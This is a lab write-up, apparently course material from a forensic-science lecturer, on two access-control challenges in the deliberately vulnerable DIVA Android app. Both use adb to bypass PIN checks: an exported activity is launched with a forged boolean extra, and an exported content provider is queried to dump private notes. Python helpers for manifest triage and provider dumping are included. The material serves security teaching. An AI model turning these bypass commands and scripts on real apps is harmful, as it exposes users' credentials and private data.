
Assignment 18

a. Authentication-based Access Control Issues, Part 2

b. In this category the attacker somehow satisfies, or sidesteps, the application's authentication check and gets access to protected resources or sensitive information; such flaws come under authentication-based access control issues.

c. This challenge is like the previous one: the protected resource is again the Twitter API credentials. The difference is that the credentials are meant to be visible only after entering a PIN, i.e. only once you are authenticated; the screen offers the options "Register now" and "Already registered".

d. Our job is to abuse this mechanism and bypass the authentication check.

e. DIVA: Access Control Issues Part 2. Here the Twitter API credentials are viewed either by registering now or by selecting "Already registered".

f. If you select "Register now" it asks you to register at http://payatu.com to get your PIN and then log in with that PIN.

g. In the second scenario, "Already registered", we are shown the Twitter API credentials.

h. Now we try to invoke the activity that shows the Twitter API credentials directly.

i. santoku@santoku:Desktop/jadx/bin/diva:#    (the directory jadx decompiled diva.apk into)

j. santoku@santoku:Desktop/jadx/bin/diva:# vim AndroidManifest.xml

k. The manifest lists every activity together with its intent filters and any permission that guards it.

l. Find the activity entry android:name="jakhar.aseem.diva.AccessControl2Activity". This is the screen with the "View API Credentials" button; as we observed, clicking it opens a second activity, registered in the manifest as android:name="jakhar.aseem.diva.APICreds2Activity", and that activity is the one that holds the API credentials.

m. AccessControl2Activity starts APICreds2Activity with an implicit intent; in the manifest APICreds2Activity carries an <intent-filter> with

<action android:name="jakhar.aseem.diva.action.VIEW_CREDS2" />

and it is this activity that holds the sensitive API data. Because the activity declares an intent filter and does not set android:exported="false", it is exported, so any app on the device (or adb shell) can send that action and start it.

n. Now copy that action string and start the activity directly with the activity manager.

o. Every Android device ships the activity manager command-line tool, am, and we use it here.

p. santoku@santoku:/$ adb shell

q. root@santoku:/ # am    // with no arguments, am prints its usage, including the options for composing an intent

r. root@santoku:/ # am start -a jakhar.aseem.diva.action.VIEW_CREDS2    // the action from the intent filter

s. Press Enter and watch Genymotion: the activity comes up, but on the PIN prompt rather than the credentials, because when the caller supplies nothing else the activity falls back to requiring the PIN. So the action alone is not enough to reach the protected data through am start.

t. Let us look at the decompiled source to see what the activity actually checks.

u. santoku@santoku:Desktop/jadx/bin:# cd diva

v. santoku@santoku:Desktop/jadx/bin/diva:# cd jakhar/

w. santoku@santoku:Desktop/jadx/bin/diva/jakhar:# cd aseem/

x. santoku@santoku:Desktop/jadx/bin/diva/jakhar/aseem:# cd diva

y. santoku@santoku:Desktop/jadx/bin/diva/jakhar/aseem/diva:# ls

z. Find the file AccessControl2Activity.java.

aa. santoku@santoku:Desktop/jadx/bin/diva/jakhar/aseem/diva:# vim AccessControl2Activity.java

bb. In the source we find the method public void viewAPICredentials(View view).

It has one boolean variable, chk_pin, and everything is decided by whether chk_pin is true or false: the value is put into the intent as an extra before the credentials activity is started.

cc. So we need to pass the value of chk_pin through the activity manager, but that is not quite as simple as it looks.

dd. Remember that chk_pin is not the literal name of the extra: the code looks it up as a string resource, and the actual value lives in strings.xml, where it is different.

ee. Open the DIVA source at https://github.com/payatu/diva-android, from which the source code can be downloaded.

ff. Go to app, then src (source), main, res (resources), values, strings.xml; it contains all the strings with their values.

gg. Search for chk_pin and find the following entry, so the key the activity reads is check_pin:

hh. <string name="chk_pin">check_pin</string>

ii. santoku@santoku:$ adb shell

jj. root@santoku:/ # am

kk. Check the <INTENT> section of the usage. To pass the extra we need, alongside -a, the option

--ez <EXTRA_KEY> <EXTRA_BOOLEAN_VALUE> (a boolean extra); -e or --es <EXTRA_KEY> <EXTRA_STRING_VALUE> passes a string, and the usage lists the options for the other types.

ll. root@santoku:/ # am start -a jakhar.aseem.diva.action.VIEW_CREDS2 --ez check_pin false

Now check Genymotion: the activity starts and shows the sensitive Twitter API information, without any PIN. The activity trusted a boolean extra supplied by the caller as proof that the PIN had been checked, and since the activity is exported, any caller can supply that extra.

a. DIVA - Access Control Issues Part 3

b. In this challenge the private notes are supposed to require a PIN, but because of the vulnerability described below we can read them without entering it.

c. DIVA - Access Control Issues Part 3: first you enter a 4-digit PIN and the app creates it; the private notes are then protected by that PIN only. Tapping "Private notes" asks for the 4-digit PIN and, once it is entered, shows the private notes.

d. The challenge is to read the private notes without entering the 4-digit PIN. For that we need to do two things:

a. find the content provider's URI;

b. query data from that content provider directly.

e. santoku@santoku:Desktop/jadx/bin/diva:# vim AndroidManifest.xml

f. <provider android:name="jakhar.aseem.diva.NotesProvider" android:enabled="true" android:exported="true" android:authorities="jakhar.aseem.diva.provider.notesprovider"/>

(Exit vim with :wq!)

g. Note that the provider is exported (android:exported="true") and declares no permission, readPermission or writePermission attribute, so any app on the device, and adb shell, can query it.
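The manifest review in Part 2 (the APICreds2Activity entry with its VIEW_CREDS2 intent filter) and here in Part 3 (the exported NotesProvider) is the same question: which components can another app, or adb shell, reach without holding any permission? The following Python script automates that over a decoded AndroidManifest.xml. It is an added example, not DIVA's code or the author's; the embedded manifest is a constructed fragment modelled on the entries quoted on this page (the ExampleLockedProvider is made up as a negative case), the rule that an intent filter implies exported is Android's documented default, and treating a provider without android:exported as private assumes targetSdkVersion 17 or later.

```python
import sys
import xml.etree.ElementTree as ET

ANDROID = "{http://schemas.android.com/apk/res/android}"

# Constructed manifest fragment modelled on the DIVA entries quoted on this
# page. The last provider is made up, as a negative (not exported) case.
SAMPLE_MANIFEST = """
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="jakhar.aseem.diva">
  <application>
    <activity android:name=".AccessControl2Activity"/>
    <activity android:name=".APICreds2Activity">
      <intent-filter>
        <action android:name="jakhar.aseem.diva.action.VIEW_CREDS2"/>
        <category android:name="android.intent.category.DEFAULT"/>
      </intent-filter>
    </activity>
    <provider android:name=".NotesProvider"
              android:authorities="jakhar.aseem.diva.provider.notesprovider"
              android:enabled="true"
              android:exported="true"/>
    <provider android:name=".ExampleLockedProvider"
              android:authorities="jakhar.aseem.diva.provider.example"
              android:exported="false"/>
  </application>
</manifest>
"""

COMPONENT_TAGS = ("activity", "activity-alias", "service", "receiver", "provider")


def is_exported(elem):
    # An explicit android:exported wins. Without it, an activity, service or
    # receiver that declares an <intent-filter> is exported implicitly, which is
    # exactly why APICreds2Activity is reachable from `am start -a ...`. A
    # provider with no attribute is treated as private (assumes targetSdk >= 17).
    explicit = elem.get(ANDROID + "exported")
    if explicit is not None:
        return explicit.lower() == "true"
    if elem.tag == "provider":
        return False
    return elem.find("intent-filter") is not None


def guarding_permissions(elem):
    # Any of these means the caller must hold a permission; an empty list means
    # every app on the device (and adb shell) can reach the component.
    return [elem.get(ANDROID + attr)
            for attr in ("permission", "readPermission", "writePermission")
            if elem.get(ANDROID + attr)]


def suggested_command(pkg, elem, name, actions):
    if elem.tag == "provider":
        authority = elem.get(ANDROID + "authorities", "").split(";")[0]
        # The table path (/notes in DIVA) is not in the manifest; it has to be
        # read from the provider's source, as with CONTENT_URI in NotesProvider.
        return f"adb shell content query --uri content://{authority}/<path-from-source>"
    if elem.tag in ("activity", "activity-alias"):
        if actions:
            return f"adb shell am start -a {actions[0]}"
        return f"adb shell am start -n {pkg}/{name}"
    return None


def find_exposed_components(manifest_xml):
    """Every exported component with its actions, guarding permissions and a
    first command to poke it with."""
    root = ET.fromstring(manifest_xml)
    pkg = root.get("package", "")
    app = root.find("application")
    findings = []
    for elem in (app if app is not None else []):
        if elem.tag not in COMPONENT_TAGS or not is_exported(elem):
            continue
        name = elem.get(ANDROID + "name", "")
        if name.startswith("."):          # ".Foo" is shorthand for "<package>.Foo"
            name = pkg + name
        actions = [a.get(ANDROID + "name") for a in elem.iter("action")]
        findings.append({"type": elem.tag, "name": name, "actions": actions,
                         "permissions": guarding_permissions(elem),
                         "command": suggested_command(pkg, elem, name, actions)})
    return findings


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_MANIFEST
    for f in find_exposed_components(text):
        guard = ", ".join(f["permissions"]) or "no permission required"
        print(f"{f['type']:<9} {f['name']}  [{guard}]")
        for action in f["actions"]:
            print(f"          action: {action}")
        if f["command"]:
            print(f"          try:    {f['command']}")
```

Run it as `python3 manifest_triage.py AndroidManifest.xml` against the file jadx produced; with no argument it runs on the embedded sample and reports APICreds2Activity (reachable via its action, no permission) and NotesProvider (exported, no read permission), while AccessControl2Activity and the locked provider do not appear. The script only reads the manifest, so it tells you where to point am and content, not what extras or URI paths a component expects; those still come from the source, as the walkthrough shows.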

h. Now move on to the source code.

i. santoku@santoku:Desktop/jadx/bin/diva $ cd jakhar/aseem/diva

j. santoku@santoku:Desktop/jadx/bin/diva/jakhar/aseem/diva: $ ls

k. Find AccessControl3Activity.java:

santoku@santoku:Desktop/jadx/bin/diva/jakhar/aseem/diva: $ vim AccessControl3Activity.java

l. and another file, NotesProvider.java, which should hold the content provider details.

m. santoku@santoku:Desktop/jadx/bin/diva/jakhar/aseem/diva: $ vim NotesProvider.java

n. Reading the code carefully, we find: static final Uri CONTENT_URI = Uri.parse("content://jakhar.aseem.diva.provider.notesprovider/notes");

o. santoku@santoku:Desktop/jadx/bin/diva/jakhar/aseem/diva:$ cd

p. santoku@santoku:$ adb shell content query --uri content://jakhar.aseem.diva.provider.notesprovider/notes

q. All the private notes are printed, without entering the PIN.

r. This works because the exported content provider at content://jakhar.aseem.diva.provider.notesprovider/notes leaks its data: the PIN is checked by the app's screen, not by the provider, which enforces no access control of its own.

s. Note that you can also exploit the same vulnerability
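Dumping the provider by hand is fine for one table. The following Python helper, added here and not part of DIVA or the author's walkthrough, builds the content query command (using the tool's --projection, --where and --sort options), runs it through adb, and parses the "Row: N col=val, col=val" lines that content query prints into Python dicts, so the leaked rows can be filtered or diffed instead of read off the screen. The sample output is constructed for the example and its column names are illustrative, not DIVA's actual schema; when run for real it assumes adb is on PATH and one device is connected.

```python
import re
import shlex
import subprocess

NOTES_URI = "content://jakhar.aseem.diva.provider.notesprovider/notes"

# Constructed sample of what `adb shell content query` prints: one line per row,
# "Row: <n>" followed by comma-separated col=value pairs, NULL for null columns
# (and "No result found." when the cursor is empty). Column names are made up.
SAMPLE_OUTPUT = """Row: 0 _id=1, title=Shopping, note=Milk, eggs, bread
Row: 1 _id=2, title=Bank, note=Card 1234, PIN 5678
Row: 2 _id=3, title=Empty, note=NULL
"""

ROW_RE = re.compile(r"^Row: (\d+) (.*)$")
# Split on ", " only where the next token looks like "<column>=", so commas
# inside a value survive (a value containing ", word=" would still confuse it).
FIELD_SPLIT_RE = re.compile(r", (?=[A-Za-z_][A-Za-z0-9_]*=)")


def parse_query_output(text):
    """Turn content query output into a list of {column: value} dicts."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue                      # "No result found.", blank lines, noise
        fields = {}
        for field in FIELD_SPLIT_RE.split(m.group(2)):
            key, _, value = field.partition("=")
            fields[key] = None if value == "NULL" else value
        rows.append(fields)
    return rows


def build_query_cmd(uri, projection=None, where=None, sort=None):
    """argv for subprocess. The device-side part is re-parsed by the device's
    shell, so each device argument is shell-quoted (a WHERE clause has spaces)."""
    device_cmd = ["content", "query", "--uri", uri]
    if projection:
        device_cmd += ["--projection", ":".join(projection)]   # colon-separated
    if where:
        device_cmd += ["--where", where]
    if sort:
        device_cmd += ["--sort", sort]
    return ["adb", "shell", " ".join(shlex.quote(arg) for arg in device_cmd)]


def run_adb(argv):
    return subprocess.run(argv, capture_output=True, text=True, check=True).stdout


def dump_provider(uri, runner=run_adb, **query_opts):
    """Query an exported provider and return its rows; `runner` is injectable so
    the parsing can be exercised without a device."""
    return parse_query_output(runner(build_query_cmd(uri, **query_opts)))


if __name__ == "__main__":
    for row in dump_provider(NOTES_URI):
        print(row)
```

Pass projection=["title", "note"] or where="_id=2" to dump_provider to pull only what you need; the WHERE string goes to the provider's query() as-is, which is also the place to start if you want to test the provider for SQL injection next.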

--
Dr. Digvijaysinh Rathod
Assistant Professor
Gujarat Forensic Sciences University - State University
Institute of Forensic Science
Sector - 9 , Gandhinagar,Gujarat,India
M: + 91 97236 19183
www.gfsu.edu.in
https://www.facebook.com/todigvijay
--
You received this message because you are subscribed to the Google Groups "CSIR18" group.
To view this discussion on the web visit https://groups.google.com/d/msgid/csir18/CANgUZS%3DYd6Z1%2B%2Br2XUhyiopwfbBr0sFmGW5DUtEzweBXdZ2SfA%40mail.gmail.com.